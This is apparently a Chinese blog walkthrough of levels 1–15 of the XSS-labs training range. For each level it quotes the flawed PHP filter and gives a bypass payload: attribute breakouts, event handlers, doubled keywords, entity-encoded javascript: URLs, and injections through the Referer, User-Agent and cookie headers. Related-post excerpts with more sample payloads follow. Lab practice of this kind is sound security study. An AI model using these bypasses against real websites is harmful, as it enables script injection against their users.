XSS-Lab 1-15

原创 已于 2022-10-12 08:40:03 修改 · 369 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #前端 #php

于 2022-08-25 09:01:20 首次发布

第1关

想要深刻理解xss就要理解源代码是怎么样的,就先从新手关里看看

$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";

直接获取一个叫name,并且输出这个name的值在界面上,所以我叫

?name=<script> alert(1) </script>

不过分吧

我们去看看

输完直接弹窗了

里面应该是欢迎用户什么都没有

第2关

先往输入框里输入

<script> alert(1) </script>

WTF?

我输对了啊,怎么不弹窗啊

看一眼界面源代码

原来是给我转义了

再看眼php源代码

echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

原来是htmlspecialchars()函数的问题,他会将以下字符转义

字符转义
>>
<<
&&amp
"&quot

你放心接下来还会看见的

所以我们只能另寻道路

<input name=keyword  value="'.$str.'">

天无绝人之路啊,直接把value给闭合了,再注入script就可以了

"><script>alert('xss')</script>//

其中">进行闭合,而//则是注释掉

第3关

看了眼源代码,是两个都打上了htmlspecialchars()函数,就问你恶心不?

怎么办,那就弄一个点击事件得了

onclick该上场了

' οnclick='alert(1)' >//

不是再另外生成js脚本,而是直接生成一个点击事件

第4关

先试试第一关的办法

上面肯定是被转义了,下面是直接把<>给去掉了

那就再试试第三关的办法,把onclick代进去

" onclick='alert(1)' //

第5关

试一下第一关的办法,直接写进去

直接给我加_避免恶意注入了

没关系,试一下第4关的办法

诶,也不生效

赶紧去看下html界面

好家伙on也直接再中间加了个_

看了下源代码

$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);

欸嘿,还转小写.

不过,不着急

我们还可以写入一个恶意的超链接

因为他又没value的值进行检测

所以我们又可以乱写啦

"> <a href=javascript:alert('xss') > xss</a> //

第6关

先看眼源代码,淦

$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

好家伙,不能像上一关那样直接写个网页了

但是他没有强制转小写啊,然后进行检测

嘿嘿,直接里面套个onclick处理

" Onclick='alert(1)' >//

第7关

看了眼源代码

$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

眉头一皱,觉得事情有点不简单,tm这不是直接没了,还带转小写的

没事,魔高一尺,道高一丈,我让你删了后正好是我想要的字符不就完事了吗?

" oonnclick='alert(1)' //

欸嘿

你把我的on去掉了变成了onclick

第8关

一个友情连接吗?

肯定没这么简单 在看眼源代码

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">

前面的各种骚操作都失效了,怎么办?

诶!我给他翻译翻译不就完事了吗?

javascript='alert(1)'

转码为poc

&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;

直接输进去就可以了

第9关

跟第8关一样,只不过多了个http://检测

直接alert(‘http://’)就行

可以局部转换

javasc&#x72;&#x69;pt:alert('xsshttp://')

第10关

看一眼源代码

有个t_sort在里面,只是进行<>检测

那么直接来个onclick

&t_sort=" type="text" οnclick="alert('xss')

可以看见直接不隐藏了,只是因为type优先第一个

第11关

再看一眼源代码

$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">

我们发现都会进行转码处理

诶 他没对http头进行处理,那么机会来了

抓包!

referer:"type="text" οnclick="alert('xss')

点一下那个方块就完事了

第12关

这个就跟第11关是一样的,要抓包,改头文件

只不过http头变为了 user-agent

user-agent:" type="text" onclick="alert('xss')

第13关

直接改cookie

$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">

我们发现他找到user的cookie 直接使用不处理

利用cookieEditor,也可以抓包

再刷新下界面

旧戏重演

第14关

不知道为啥用不了,直接15关

第15关

啥都没有,有点怪

看眼源代码

<span class="ng-include:'.htmlspecialchars($str).'">

我们可以利用ng-include.这相当于c语言里的clude

直接给他个有漏洞的php网页不就可以了吗?

?src='level1.php?name=<img src=1 οnerrοr=alert(1)>'

好了,结束,下班

XSS-labs
Mccc_li的博客
04-09 1197
大佬总结的xss的原理 1.level1 输入 < script>alert<\script>就通过了,这道题应该是反射型的xss,数据到了后端再回到浏览器 为什么能够运行? GET输入了name的参数,然后 PHP 会读取该参数,如果不为空,则直接打印出来,这里不存在任何过滤。也就是说,如果参数中存在 HTML 结构性的内容,打印之后会直接解释为 HTML 元素。 常见...
XSS攻击-xss-lab1-10)详细讲解
qq_43395215的博客
05-06 9456
xss概述 ​ XSS,全称跨站脚本,XSS跨站脚本(Cross-Site Scripting,XSS(与css-层叠样式表冲突,所以命名为xss)),某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要注意的是,XSS不仅仅扩展JavaScript,还包括flash等其他脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存...
XSS-lab靶场(11~15
bin789456的博客
05-26 407
Level 11 <?php ini_set("display_errors", 0); $str = $_GET["keyword"]; $str00 = $_GET["t_sort"]; $str11=$_SERVER['HTTP_REFERER']; $str22=str_replace(">","",$str11); $str33=str_replace("<","",$str22); echo "<h2 align=center>没有找到和".htmlspecial
XSS-labs靶场实战(六)——第15关及Angular JS利用
永远是少年
11-19 1094
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS-labs靶场实战第15-17关。 一、第十五关简介 二、Angular JS简介 三、第十五关突破
XSSxss-labs-level15
Hugu
02-24 891
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的
Xss-labs(1)第一关到第十一关
m0_46412408的博客
09-25 851
Xss-labs靶场训练第一关:查看页面源代码回显playload长度:插入一段js代码,get传参,一个简单的插入顺利来到第二关,二话不说先直接尝试插入,并没有成功:查看页面源代码:特殊字符被实体转义了我们需要闭合掉双引号即可,构造payload,这一关是闭合绕过来到第三关,随便输入一个闭合弹窗试试,符号也被实体化了:查看php源码。
XSS-Lab 1-10
qq_51558360的博客
03-21 381
不使用过滤器 name=<script>alert(1)</script> 闭合标签 输入第一题的答案,没有成功,查看源码,发现: 我们输入的数据,是在表单中的value属性内 法一: 所以需要先闭合input标签,然后在注入代码,闭合标签: "><script>alert(1)</script> 法二: 是闭合value属性,然后在input标签内加入事件属性: " οnclick="alert(11) 单引号闭合并添加事件 输入测试:
xsslab
m0_65151172的博客
04-08 208
(解释一下onclick函数,正常格式的onclick是这样的onclick='alert(1)',这个函数是在点击的时候触发的,之所以我们注入代码是这样的' onclick='alert(1)是因为onclick函数得在一个标签中才能被浏览器识别,所以我们第一个单引号是用来闭合value='这个单引号的,第二个单引号是用来和'>这个单引号形成闭合构成onclick正常的语句的,而且,第一个单引号和onclick 中间得有空格,这样onclick才能被识别出来是个函数 )">xss</a>,成了!
xss-lab全通关教程
05-07
XSS-lab的20个关卡中,你将依次接触这些类型,并学习如何构造有效的XSS payload,以及如何利用各种过滤和转义机制来绕过防护。例如,你可能会遇到如何在URL参数、表单提交或者cookies中隐藏和传递XSS payload的...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器,当其他用户访问同一页面时,脚本将在用户的浏览器中执行。 2. **反射型XSS**:非持久性,恶意脚本通过URL参数传递,用户点击链接或者提交表单后,...
xss-labs-master.rar
05-09
XSS实验室详解:从入门到精通》 XSS(Cross-site scripting)是一种常见的Web应用程序安全漏洞,允许攻击者在用户浏览器中注入恶意脚本。"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助...
xsslabs.zip
07-23
xss-labs是国内一个大佬开源的xss漏洞靶子,包含一些常见的xss攻击方法,是学习xss的必备工具
xss-labs.zip
06-25
1. 存储型XSS:攻击者将恶意脚本存入服务器,当其他用户访问含有恶意脚本的页面时,脚本会在用户的浏览器中执行。在实验室环境中,我们需要找出能够将脚本注入数据库并触发执行的途径。 2. 反射型XSS:这种类型的...
xss lab
None
11-12 906
xss lab靶场实战,共20道题目,考察多种xss漏洞绕过手段与xss技巧
xss-lab
zl0_00_0的博客
02-25 778
XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面中执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览该页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 cookie窃取等。
xss-labs/level15
m0_71299382的博客
11-29 537
xss-labs/level15
xss-labs
2302_80044238的博客
03-23 1249
jsp的全称是java servlet page 它就是java的服务器页面因为它相对于servlet传回数据的方法比较简单Servlet的本质是一个,旨在处理HTTP请求并生成HTTP响应。
XSSLab (1~10)
开心星人的博客
05-14 377
一 http://test.ctf8.com/level1.php?name=<script>alert(1)</script> 二 输入<script>alert(1)</script> 查看源码看到<input name=keyword value="<script>alert(1)<script>"> 构造 " onclick="alert(1) 三 输入" onclick="alert(1) 查看源码看到<i
XSS-LabXSS注入教程)
DMXA的博客
11-01 1037
解题思路:先观察题目的类型,猜哪个地方可以存在注入,代码分析这个可以交给chatgpt,下面就可以尝试自己构造好的payload 做了10题下来,发现难度是依次上升的解题思路:先观察题目的类型,猜哪个地方可以存在注入,然后是代码分析,这个可以交给chatgpt,下面就可以尝试自己构造好的payload,也可以进行BP抓包看下具体数据,或者指纹识别查一下框架是否有历史漏洞, XSS常用的标签:
xss-lab下载安装
最新发布
03-22
### 下载与安装 XSS-Lab XSS-Lab 是一个基于 PHP 的学习平台,旨在帮助用户了解和实践跨站脚本攻击 (XSS) 的原理和技术。以下是关于如何下载和安装该工具的相关信息。 #### 1. 获取 XSS-Lab 源码 可以从其官方仓库或其他可信资源获取源代码。通常情况下,这类项目会托管在 GitHub 或其他类似的开源平台上。访问对应的存储库地址并克隆或下载 ZIP 文件到本地环境[^2]。 #### 2. 安装依赖项 由于 XSS-Lab 使用的是 PHP 编写的服务端逻辑,因此需要确保服务器上已配置好支持 PHP 脚本运行的 Web Server 和数据库管理系统(如果适用)。具体需求可能包括但不限于以下组件: - **Web Server**: Apache, Nginx 等能够处理动态页面请求的应用程序。 - **PHP 版本**: 推荐使用最新稳定版本或者至少满足最低兼容标准的版本号。 - **MySQL/MariaDB 数据库**(视情况而定): 如果某些关卡涉及数据持久化操作,则需设置相应的 DB 连接参数。 对于 Linux 用户来说,可以通过包管理器来快速部署这些服务;Windows 平台则推荐 XAMPP/WAMP 套件简化整个过程。 #### 3. 配置环境变量及权限调整 解压后的文件夹应放置于 webroot 目录下,默认路径可能是 `/var/www/html/` 对于 Ubuntu 发行版而言。接着修改 `config.php` 中有关站点 URL、管理员账户密码以及其他敏感选项的内容以适配实际应用场景的需求。 另外还需注意检查各目录读写执行权是否恰当分配给 httpd/nginx user group ,防止因权限不足而导致功能异常的现象发生。 #### 4. 启动服务验证正常工作状态 完成上述准备工作之后重启相关联的服务进程,并打开浏览器输入指定网址确认能否成功加载首页界面以及后续挑战环节链接均可正常使用即可认为初步搭建完毕。 ```bash sudo service apache2 restart # or for nginx users sudo systemctl reload nginx ``` --- ### 示例代码片段展示部分技巧应用实例 下面给出一段利用 HTML 注入实现弹窗效果的小例子供参考理解潜在风险所在之处: ```html <a href="javascript:alert('xss');">Click Me</a> <!-- 将 on 替换为 o_n 可绕过简单过滤机制 --> <img src=x onerror=alert(1)> <!-- 利用 URL 编码隐藏恶意字符 --> <img%0Asrc=1%0Aonerror=alert(1)> ``` 以上演示分别体现了直接嵌套 JavaScript 函数调用方式触发警告框提示消息;通过变形关键字规避检测手段达成相同目的;还有借助特殊转义序列混淆视听从而突破防御屏障三种不同类型的尝试手法][^[^34]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值